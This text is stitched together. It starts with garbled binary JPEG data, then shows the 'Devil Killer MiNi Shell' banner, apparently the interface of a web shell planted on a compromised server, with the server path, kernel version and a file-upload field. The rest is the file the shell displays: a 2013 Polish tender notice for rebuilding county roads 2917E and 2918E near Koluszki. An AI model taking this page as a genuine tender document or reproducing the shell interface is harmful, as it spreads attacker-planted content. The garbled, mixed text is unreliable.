JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130524/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130524/203076-N-2013.html

<p class="kh_header"><b>Łódź: Przebudowa ciągu komunikacyjnego dróg powiatowych 
Nr 2917E i Nr 2918E na odcinku Stefanów - Koluszki</b><br>
<b>Numer ogłoszenia: 203076 - 2013; data zamieszczenia: 24.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Łódzki Wschodni reprez. przez Zarząd Powiatu , ul. Sienkiewicza 3, 90-954 Łódź, tel. 0-42 6337191, 6335575, faks 0-42 6329311.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lodzkiwschodni.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ciągu komunikacyjnego dróg powiatowych 
Nr 2917E i Nr 2918E na odcinku Stefanów - Koluszki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest modernizacja systemu komunikacyjnego na dwóch drogach powiatowych oznaczonych nr 2918E i nr 2917E położonych w obrębie geodezyjnym Katarzynów w gminie Koluszki w powiecie łódzkim wschodnim. Modernizacja obejmuje odcinek drogi powiatowej nr 2918E - ul. 11-Listopada od terenu PKP (wschodnia granica działki nr ew. 462) do skrzyżowania z drogą powiatową nr 2917E (ul. Warszawska) oraz odcinek drogi powiatowej nr 2917E od skrzyżowania z ul. 11 Listopada w kierunku południowym do granicy obrębu geodezyjnego Katarzynów z obrębem geodezyjnym Stefanów.

1.	Stan istniejący
Modernizowany odcinek drogi powiatowej nr 2918E długości 460,6m posiada przekrój półuliczny z jednostronnym chodnikiem i jednostronnym rowem przydrożnym połączonym z rowem melioracyjnym poprzez betonowy przepust drogowy 2o800mm. Jezdnia o nawierzchni bitumicznej szerokości ok. 6,0m. W pasie drogowym znajdują się zjazdy do posesji oraz umieszczone są następujące urządzenia techniczne niezwiązane z potrzebami zarządzania drogą lub potrzebami ruchu drogowego:
- wodociąg o110 i o160 z przyłączami,
- skrzyżowanie z gazociągiem g180 oraz przyłączem gazu g25,
- skrzyżowanie z dwoma kablami telefonicznymi,
- skrzyżowanie z nieczynnymi rurociągami naftowymi. 

Modernizowany odcinek drogi powiatowej nr 2917E długości 1650,0m ma przekrój drogowy z obustronnymi poboczami ziemnymi i fragmentarycznie występującymi rowami przydrożnymi. Jezdnia o nawierzchni bitumicznej szerokości 4,5-5,0m. W pasie drogowym umieszczone są następujące urządzenia techniczne niezwiązane z potrzebami zarządzania drogą lub potrzebami ruchu drogowego:
- sieć wodociągowa o 100 (strona lewa i prawa) z przyłączami,
- doziemna i napowietrzna sieć teletechniczna,
- sieć gazowa g160 z przyłączami gazowymi,
- napowietrzna sieć elektroenergetyczna z oświetleniem ulicznym,
- skrzyżowanie z kablem energetycznym wn.

Nawierzchnie jezdni na całej długości modernizowanego układu komunikacyjnego w znacznym stopniu zniszczone z licznymi ubytkami, nierównościami i spękaniami, rowy przydrożne zamulone i zarośnięte. Chodnik i zjazdy w ciągu ul. 11-Listopada w dobrym stanie technicznym, wymagają przebudowy z uwagi na zmiany niwelety drogi. Stan oznakowania poziomego i pionowego jest niedostateczny, wymaga naprawy i uzupełnienia.

2.	Stan projektowany
2.1.	Droga 2918E ul. 11-Listopada
Przewiduje się pozostawienie drogi w obecnym śladzie i obecnej szerokości, jedynie na łuku poziomym nastąpi poszerzenie jezdni do 6,50m. W ramach modernizacji na całym odcinku drogi nastąpi budowa kanalizacji deszczowej oraz przebudowa drogi obejmująca wykonanie nowej podbudowy, nowej nawierzchni mineralno-asfaltowej, nowych chodników i zjazdów z kostki betonowej na projektowanej podbudowie, wymiana przepustów rurowych, zabezpieczenie istniejącej infrastruktury technicznej w drodze, oczyszczenie rowów z namułu, plantowanie, humusowanie i obsianie skarp trawą, wykonanie oznakowania pionowego wraz z elementami bezpieczeństwa.


Zestawienie podstawowych robót obejmuje:
1)	roboty przygotowawcze
- roboty pomiarowe
2)	roboty zabezpieczające
- kładki dla pieszych
- barierki ochronne
- konstrukcje podwieszeń rurociągów i kanałów
3)	roboty rozbiórkowe
- cięcie i frezowanie nawierzchni bitumicznych
- ręczne rozebranie chodników i zjazdów z kostki betonowej, krawężników i obrzeży, ułożenie na paletach i zafoliowanie
- rozebranie ław pod krawężnikami, przepustów rurowych ze ściankami czołowymi i ławami
- załadowanie i wywózka wyrobów drogowych na miejsce wskazane przez inwestora
- wywózka gruzu z terenu rozbiórki
4)	roboty ziemne
- wykopy mechaniczne i ręczne
- umocnienie pionowych ścian wykopów pod kanalizację deszczową
- transport urobku
- zasypanie wykopów i formowanie nasypów z zagęszczeniem
- profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne drogi
5)	roboty montażowe kanalizacji deszczowej
- założenie rur ochronnych na istniejących sieciach
- wykonanie podłoży pod kanały i studnie rewizyjne i ściekowe
- montaż betonowych studni rewizyjnych i ściekowych
- ułożenie kanałów z rur polipropylenowych 
- wykonanie prób szczelności i inspekcji kanałów kamerą TV
6)	podbudowy
- wykonanie warstwy odcinającej 
- podbudowy betonowe
- podbudowy z kruszywa łamanego twardego (granit, bazalt)
- podbudowa z mieszanki mineralno-asfaltowej
7)	elementy ulic
- wykonanie ław betonowych pod krawężniki i ścieki przykrawężnikowe
- ułożenie krawężników
- ułożenie ścieków przykrawężnikowych z kostki betonowej
- ułożenie obrzeży betonowych
8)	nawierzchnie
- jezdni z mieszanek mineralno-asfaltowych
- chodników i zjazdów z kostki betonowej  
9)	roboty wykończeniowe
- układanie rur ochronnych typu AROT
- ręczne plantowanie, humusowanie skarp z obsianiem trawą
- wykonanie pod zjazdami przepustów rurowych na ławach i ze ściankami czołowymi
- wykonanie przepustu drogowego na ławie betonowej ze ściankami czołowymi i umocnieniem wylotów
- zamocowanie barierek ochronnych przy wylotach przepustu drogowego
- oczyszczenie rowów z namułu z wyprofilowaniem skarp
10)	oznakowanie drogi  i elementy bezpieczeństwa ruchu
- wykonanie oznakowania pionowego drogi
- wykonanie barierek nad przepustem

2.2.	Droga nr 2917E
Przewiduje się pozostawienie drogi w obecnym pasie drogowym z lewostronnym poszerzeniem jezdni do 5,50 m oraz budowę chodnika dla pieszych po stronie lewej na całym odcinku modernizacji. W ramach modernizacji przewidziano budowę kanalizacji deszczowej w km 0+971 do 1+013 z odprowadzeniem wód do dwóch studni chłonnych oraz przebudowę drogi obejmującą wykonanie nowej podbudowy, nowej nawierzchni mineralno-asfaltowej, nowych zjazdów z kostki betonowej po stronie lewej i prawej, wykonanie pobocza z tłucznia kamiennego, usuniecie kolizji z linią energetyczną, zabezpieczenie istniejącej infrastruktury technicznej w drodze, oczyszczenie rowów z namułu, plantowanie, humusowanie i obsianie skarp trawą, wykonanie oznakowania pionowego i poziomego wraz z elementami bezpieczeństwa.

Zestawienie podstawowych robót obejmuje:
1)	roboty przygotowawcze
- geodezyjne wytyczenie obiektu w terenie
- roboty pomiarowe
2)	roboty ziemne i rozbiórkowe
- frezowanie nawierzchni bitumicznej z wywozem materiału na wskazane miejsce przez inwestora
- wykopy mechaniczne z wywozem urobku poza teren budowy 
- mechaniczne profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne
3)	wykonanie elementów odwodnienia
- posadowienie studni ściekowych, chłonnych i rewizyjnych
- wykonanie kanałów deszczowych
4)	usunięcie kolizji z siecią elektroenergetyczną
- demontaż odcinków linii napowietrznej i przyłączy do posesji
- demontaż opraw oświetleniowych i wysięgników
- przestawienie 4 słupów żelbetowych linii nn 
- montaż wysięgników i opraw oświetleniowych
- odtworzenie linii nn i przyłączy
- uziemienie 
- pomiary kontrolne
- zabezpieczenie istniejących kabli energetycznych rurami dwudzielnymi
5)	wykonanie elementów ulic i chodnika
- wykonanie ław betonowych
- ustawienie krawężników 
- wykonanie warstwy odsączającej i podbudowy chodników
- ułożenie chodników z kostki betonowej
6)	wykonanie podbudowy i nawierzchni jezdni
- wykonanie warstwy odsączającej
- wykonanie podbudowy z gruntu stabilizowanego cementem
- wykonanie podbudowy z kruszyw łamanych twardych
- wykonanie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych
- wykonanie pobocza z kruszywa łamanego
7)	wykonanie zjazdów z kostki betonowej 
- ustawienie obrzeży betonowych
- wykonanie warstwy odsączającej
- wykonanie podbudowy z gruntu stabilizowanego cementem
- wykonanie podbudowy z kruszyw łamanych
- wykonanie nawierzchni z kostki betonowej
8)	oznakowanie drogi  i elementy bezpieczeństwa ruchu
- wykonanie oznakowania poziomego drogi
- wykonanie oznakowania pionowego drogi
- wykonanie barierki na ściance czołowej przepustu

9)	roboty odtworzeniowe
- odtworzenie punktów osnowy geodezyjnej i inwentaryzacja geodezyjna
- regulacja pionowa armatury
- zabezpieczenie kabli tp rurami dwudzielnymi
Zamawiający wymaga ponadto wykonania i wyceny wg własnej kalkulacji następujących robót:
- wycinki i wykarczowania 37 drzew w pasie drogi 2917E
- sporządzenia projektu stałej organizacji ruchu na drodze nr 2917E (na odcinku objętym zamówieniem), uzyskania wymaganych uzgodnień i zatwierdzeń projektu
 Zamawiający wymaga zamontowania żeliwnych wpustów ulicznych i pokryw studni na zawiasach..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.10.00.00-8, 45.23.32.20-7, 45.23.24.51-8, 45.31.00.00-3, 45.23.24.10-9, 45.23.21.30-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający określa wysokość wadium w przedmiotowym postępowaniu wysokość  wadium w kwocie:- 50.000,00 zł.
(słownie: pięćdziesiąt tysięcy złotych 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w zakresie tego  warunku żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów i oświadczeń załączonych do oferty, wskazanych w Specyfikacji istotnych warunków zamówienia, wg. formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że wykonał  w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej trzy roboty budowlane polegające na wykonaniu, przebudowie, rozbudowie lub remoncie dróg, ulic, placów, parkingów o wartości co najmniej 1 000 000,00 zł brutto każda, w tym jedna obejmująca budowę, przebudowę lub rozbudowę kanalizacji deszczowej lub sanitarnej oraz załączy dowody dotyczące najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów i oświadczeń załączonych do oferty, wskazanych w Specyfikacji istotnych warunków zamówienia, wg. formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów i oświadczeń załączonych do oferty, wskazanych w Specyfikacji istotnych warunków zamówienia, wg. formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej kadrą złożoną z osób posiadających prawo do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalnościach: 
a.	drogowej lub konstrukcyjno - budowlanej uprawniających do kierowania robotami co najmniej na drogach zbiorczych (Z), 
b.	instalacyjno - sanitarnych,
c.	 instalacyjno - elektrycznych. 
Dopuszcza się możliwość pełnienia więcej niż jednej funkcji przez jedną osobę, pod warunkiem łącznego spełnienia przez wskazaną osobę wyżej określonych wymagań.
Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów i oświadczeń załączonych do oferty, wskazanych w Specyfikacji istotnych warunków zamówienia, wg. formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje środkami finansowymi lub posiada zdolność kredytową w wysokości nie mniejszej niż 1.000.000,00 PLN brutto.
Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów i oświadczeń załączonych do oferty, wskazanych w Specyfikacji istotnych warunków zamówienia, wg. formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym i osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
2. Upoważnienie (pełnomocnictwo) do podpisywania oferty winno być dołączone do oferty, o ile nie wynika ono z innych dokumentów załączonych przez Wykonawcę do oferty.
3.1)	Dowodami potwierdzającymi czy roboty zostały wykonane w sposób należyty oraz wskazującymi, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone są:
a)	poświadczenie, 
b)	lub inne dokumenty potwierdzające że roboty zostały wykonane w sposób należyty oraz wskazujące, że zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.
3.2) W przypadku, gdy Wykonawca wskaże w wykazie wykonanych robót na potwierdzenie warunku udziału w postępowaniu roboty budowlane wykonane na rzecz Powiatu Łódzkiego Wschodniego, wówczas Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w pkt 3.1.
3.3) Wykonawca w miejsce poświadczeń, o których mowa powyżej może przedłożyć dokumenty potwierdzające czy roboty budowlane zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, określone w § 1 ust. 1 pkt 2 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
